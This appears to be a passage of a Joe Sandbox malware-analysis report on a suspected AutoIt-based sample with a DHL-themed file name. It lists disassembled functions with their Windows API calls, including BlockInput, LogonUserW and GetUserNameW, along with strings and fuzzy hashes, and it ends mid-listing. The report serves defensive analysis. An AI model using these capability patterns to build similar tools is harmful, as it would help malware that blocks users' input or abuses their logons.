Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 12a346186ed89559270b3a97f780d6674fc582b76c45ef1e5b11fb861a795caa
Instruction ID: ed20e07e4eb3e798a069f412269461c3b54e3e363ffecea2f52a0d08241a6a52
Opcode Fuzzy Hash: 12a346186ed89559270b3a97f780d6674fc582b76c45ef1e5b11fb861a795caa
Instruction Fuzzy Hash: 1AE0B676015A10EEEB252B65EC09D777BADFB443617248829F596C0470DB72AC90EB10

Function 008FA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,008F8F97,?,?,?,00000001), ref: 008FA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008FA3A3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 41092d3f23a7102f245b5c6d905953c8fd49fb3f3f3d9e6fca8a7806066e07e3
Instruction ID: 328893d15005c77b136d064f12a613d9be7f6f304b4378d551a5dc8d77e7cc4e
Opcode Fuzzy Hash: 41092d3f23a7102f245b5c6d905953c8fd49fb3f3f3d9e6fca8a7806066e07e3
Instruction Fuzzy Hash: BFB09231068308ABEA002F92ED19B893F68EB44BF3F404020F60D84070CB725450AB91

Function 008FF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8b94a26842ac2ad9a5458dee61f853d390ff30dcf2a5be7b993129e41d8a31
Instruction ID: 709590350ed58bad18c2a9240fa463c04057c4516eabf14f160a8aa9665c4149
Opcode Fuzzy Hash: 3e8b94a26842ac2ad9a5458dee61f853d390ff30dcf2a5be7b993129e41d8a31
Instruction Fuzzy Hash: CD32F222D7DF194DD7239634D832335A248EFB73D8F15D73BE929B5AA6EB2884835100

Function 0090267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0240142389a6a5bcebd9486c48166dffa7144921f5c3818cdf44f60359826ba8
Instruction ID: 5d555873f34a24d23827fe7ce8f094e70f05a1167bae86e91c01038c09b807b4
Opcode Fuzzy Hash: 0240142389a6a5bcebd9486c48166dffa7144921f5c3818cdf44f60359826ba8
Instruction Fuzzy Hash: 2FB11120D3AF414DD32396398835336B64CAFBB2C5F51D71BFC2674E62EB6285835541

Function 00938B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00938B25

Part of subcall function 008F543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009391F8,00000000,?,?,?,?,009393A9,00000000,?), ref: 008F5443
Part of subcall function 008F543A: __aulldiv.LIBCMT ref: 008F5463

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 1de603937128a76839698961b8bdca4904947f52c36ceffd0ae88330bc798c08
Instruction ID: c344142aa82e183db6a4fe994dc61dc39e08f9d43e3ac80ce94af29b7a97efdd
Opcode Fuzzy Hash: 1de603937128a76839698961b8bdca4904947f52c36ceffd0ae88330bc798c08
Instruction Fuzzy Hash: E0210272638610CBC729CF29D441A52F3E1EBA4311F288E2DE0E5CB2D0CE30B905DB94

Function 009441FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00944218

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 28356779bfdb7bf5f8bd16c562a11420e78c3bb6fce1c745a3eacbe7ba4a73ef
Instruction ID: 68177d9baca06afde06d9c37d51e8935176d21a14636b41c991caf48dbcb6693
Opcode Fuzzy Hash: 28356779bfdb7bf5f8bd16c562a11420e78c3bb6fce1c745a3eacbe7ba4a73ef
Instruction Fuzzy Hash: C7E01A32250214AFCB10AF5AD844E9AB7E8EF94761F008426F849C7352DAB0A8408BA1

Function 00934EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00934EEC

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: b5ef4481c6ab9e99333799d54a8c0fdbc194a490723bf99baca8838745c34018
Instruction ID: e48638165ba7662d97d75923edd50095f19c3feaff7a25ef5b049eac6ec67177
Opcode Fuzzy Hash: b5ef4481c6ab9e99333799d54a8c0fdbc194a490723bf99baca8838745c34018
Instruction Fuzzy Hash: E3D052AA1607083AED388B249C6FF77020CF301782FD24AAAB102890C2E8D47C91A830

Function 00928C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009288D1), ref: 00928CB3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: d8a774f8f4fee9ad64d344fc89de0da576e2d0e2f84edf52b777c0396812002a
Instruction ID: 7e88ea938d2ac91c3ccf57b250997a4dd33f0f02d12478232e71bc3d267be582
Opcode Fuzzy Hash: d8a774f8f4fee9ad64d344fc89de0da576e2d0e2f84edf52b777c0396812002a
Instruction Fuzzy Hash: 5FD05E3226460EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60

Function 00912230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00912242

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 34b75094bd983f56924365694103fdca81e64779454a7f2e1161c7dc0dbcbcc2
Instruction ID: 3435465bf640b75798ea134221bff654c01cae254ea2146140eb59c8abc51466
Opcode Fuzzy Hash: 34b75094bd983f56924365694103fdca81e64779454a7f2e1161c7dc0dbcbcc2
Instruction Fuzzy Hash: 64C04CF181510DDBDB05DBA0D998DEE77BCAB04315F144455A101F2140D7749B449B71

Function 008FA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 008FA36A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7c1b747307fd1b8f95e9f16735467971bca9b8a435ceb560a165ceab5071557
Instruction ID: 56b09929b066e25f495ee163d01d500f06eb3e1bbdd375f9a00ebd24b304a8cc
Opcode Fuzzy Hash: f7c1b747307fd1b8f95e9f16735467971bca9b8a435ceb560a165ceab5071557
Instruction Fuzzy Hash: 92A0113002820CAB8A002F82EC08888BFACEA002E2B008020F80C800328B32A820AA80

Function 008E8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a57937ee475359391447dcc58e1df00aafe76dc0e56f5ca1eb0f7603274cee
Instruction ID: 935929ede7cc3a9c63ce89878bb45285be28103d555cbbeae45d7234bfe81f70
Opcode Fuzzy Hash: 57a57937ee475359391447dcc58e1df00aafe76dc0e56f5ca1eb0f7603274cee
Instruction Fuzzy Hash: 7F2268305056A6DBCF28CB2AD4C467DB7A1FB43314F3A842AD84ADB295DB34DD81CB61

Function 008F2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 381811f22137f033ad7afd389aa5dd92bba000ae51c39f3262036e5b7a1247a9
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: B9C193322150974ADF6D863AD43413EBAE1FEA27B131A076DE5B3CB5D4EF20D624D620

Function 008F283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 1a1fb9d43765e6f513b19cdd1b0370ea6fbef9c86bcb691d1fce38dadc36ded2
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 7FC196322151A749DF2D463AD43403EBBE1FBA27B131A076DE5B2DB5D4EF20D624E620

Function 008F1BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: d7eb66ba0e846e79f89c1dfa1ddf65a4e0dcd00146cd69c6d28bb450359566a1
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: CBC1833221519789DF2D463A947803EBBE1FBA27B131A076DE5B3CB5D4EF20D624D620

Function 00947B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00947B70
DeleteObject.GDI32(00000000), ref: 00947B82
DestroyWindow.USER32 ref: 00947B90
GetDesktopWindow.USER32 ref: 00947BAA
GetWindowRect.USER32(00000000), ref: 00947BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00947CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00947D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947D4A
GetClientRect.USER32(00000000,?), ref: 00947D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00947D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DD0
GlobalLock.KERNEL32(00000000), ref: 00947DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DE8
GlobalUnlock.KERNEL32(00000000), ref: 00947DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DF8
GlobalFree.KERNEL32(00000000), ref: 00947E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00962CAC,00000000), ref: 00947E2B
GlobalFree.KERNEL32(00000000), ref: 00947E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00947E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00947E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0094808F

Strings

static, xrefs: 00947D8A, 00947EE1
AutoIt v3, xrefs: 00947D42
DISPLAY, xrefs: 00947EF2
, xrefs: 00948015

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 4a68b0e7ccc12a5b873e9f9e3031f2b687ec0defdd33fb398cf2ea8d18ce884b
Instruction ID: 6383733445ec12157292f9c3f06991053421b4c786abaceea4b3d742c2459f13
Opcode Fuzzy Hash: 4a68b0e7ccc12a5b873e9f9e3031f2b687ec0defdd33fb398cf2ea8d18ce884b
Instruction Fuzzy Hash: A0029D71914209EFDB14DFA9CC99EAEBBB9FB48311F108559F915EB2A0CB309D00DB60

Function 009537F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0095F910), ref: 009538AF
IsWindowVisible.USER32(?), ref: 009538D3

Strings

CHECK, xrefs: 00953AF5
SETCURRENTSELECTION, xrefs: 00953A3E
FINDSTRING, xrefs: 009539FE
CURRENTTAB, xrefs: 00953945
ISVISIBLE, xrefs: 009538BF
TABRIGHT, xrefs: 00953925
GETLINECOUNT, xrefs: 00953B4E
GETSELECTED, xrefs: 00953B2B
UNCHECK, xrefs: 00953B0B
SELECTSTRING, xrefs: 00953A8E
EDITPASTE, xrefs: 00953BE7
GETCURRENTLINE, xrefs: 00953B75
ADDSTRING, xrefs: 0095399E
GETCURRENTCOL, xrefs: 00953BB0
DELSTRING, xrefs: 009539D1
GETLINE, xrefs: 00953C23
HIDEDROPDOWN, xrefs: 00953988
ISENABLED, xrefs: 009538F3
TABLEFT, xrefs: 0095390F
ISCHECKED, xrefs: 00953AC1
SENDCOMMANDID, xrefs: 00953C62
GETCURRENTSELECTION, xrefs: 00953A6B
SHOWDROPDOWN, xrefs: 00953968

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: c806f43ab6a02b7f8933f15d3efa195908de06e1cfbd485de1aaba8df9f30dc5
Instruction ID: 624cb20c85889a29d0a6bf4c8d4e07366bafae22dbc723ace254745d339b4b46
Opcode Fuzzy Hash: c806f43ab6a02b7f8933f15d3efa195908de06e1cfbd485de1aaba8df9f30dc5
Instruction Fuzzy Hash: 7FD1A030204315DBCB24FF25C451A6AB7A5FF95385F048959FC869B3A3CB25EE0ACB52

Function 0095A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0095A89F
GetSysColorBrush.USER32(0000000F), ref: 0095A8D0
GetSysColor.USER32(0000000F), ref: 0095A8DC
SetBkColor.GDI32(?,000000FF), ref: 0095A8F6
SelectObject.GDI32(?,?), ref: 0095A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0095A930
GetSysColor.USER32(00000010), ref: 0095A938
CreateSolidBrush.GDI32(00000000), ref: 0095A93F
FrameRect.USER32(?,?,00000000), ref: 0095A94E
DeleteObject.GDI32(00000000), ref: 0095A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0095A9A0
FillRect.USER32(?,?,?), ref: 0095A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0095A9FD

Part of subcall function 0095AB60: GetSysColor.USER32(00000012), ref: 0095AB99
Part of subcall function 0095AB60: SetTextColor.GDI32(?,?), ref: 0095AB9D
Part of subcall function 0095AB60: GetSysColorBrush.USER32(0000000F), ref: 0095ABB3
Part of subcall function 0095AB60: GetSysColor.USER32(0000000F), ref: 0095ABBE
Part of subcall function 0095AB60: GetSysColor.USER32(00000011), ref: 0095ABDB
Part of subcall function 0095AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095ABE9
Part of subcall function 0095AB60: SelectObject.GDI32(?,00000000), ref: 0095ABFA
Part of subcall function 0095AB60: SetBkColor.GDI32(?,00000000), ref: 0095AC03
Part of subcall function 0095AB60: SelectObject.GDI32(?,?), ref: 0095AC10
Part of subcall function 0095AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0095AC2F
Part of subcall function 0095AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095AC46
Part of subcall function 0095AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0095AC5B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: b8ce53735bb702b11fad759117edf39710cd8f58c6bb4a8b919def4bac0c024b
Instruction ID: b04bfe3678a7fa48848e7e8c0546df5e0d4729ed255ad0cc62d938a264d4bd57
Opcode Fuzzy Hash: b8ce53735bb702b11fad759117edf39710cd8f58c6bb4a8b919def4bac0c024b
Instruction Fuzzy Hash: 7FA18F72018301AFDB10DF66DC18A6B7BA9FF89332F104B29F962961E0D734D949DB52

Function 008D2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 008D2CA2
DeleteObject.GDI32(00000000), ref: 008D2CE8
DeleteObject.GDI32(00000000), ref: 008D2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 008D2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 008D2D09
